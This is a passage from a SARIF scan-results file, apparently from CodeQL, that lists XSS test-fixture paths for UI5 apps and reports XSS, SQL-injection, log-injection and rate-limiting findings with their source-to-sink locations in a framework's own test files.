- } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 353 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 354 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 357 - } - }, { 
- "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 358 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 359 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 364 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 365 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 366 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 368 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 369 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 370 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 372 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 373 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 374 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 376 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 377 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 378 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 380 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 381 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 383 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 384 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 385 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 390 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 391 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", - "uriBaseId" : 
"%SRCROOT%", - "index" : 392 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 394 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 395 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 400 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 401 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : 
"%SRCROOT%", - "index" : 403 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 412 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 413 - } - }, { - "location" : { - "uri" : "qlt.conf.json", - "uriBaseId" : "%SRCROOT%", - "index" : 414 - } - }, { - "location" : { - "uri" : "scripts/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 415 - } - }, { - "location" : { - "uri" : "scripts/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 416 - } - } ], - "results" : [ { - 
"ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6311a9ed7e4091a4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - 
"index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c51cf11a085c01f4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - 
"message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e309bf8540256a05:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... 
(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/missing-rate-limiting", - "rule" : { - "id" : "js/missing-rate-limiting", - "index" : 68, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This route handler performs [a database access](1), but is not rate-limited." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 40, - "startColumn" : 25, - "endLine" : 44, - "endColumn" : 8 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", - "primaryLocationStartColumnFingerprint" : "18" - }, - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 9, - "endLine" : 43, - "endColumn" : 11 - } - }, - "message" : { - "text" : "a database access" - } - } ] - }, { - "ruleId" : "js/sql-injection", - "rule" : { - "id" : "js/sql-injection", - "index" : 78, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This query string depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4fc3122b51f477a1:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ccc6f77c65eccb45:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 32, - "endColumn" : 36 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "\"console:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
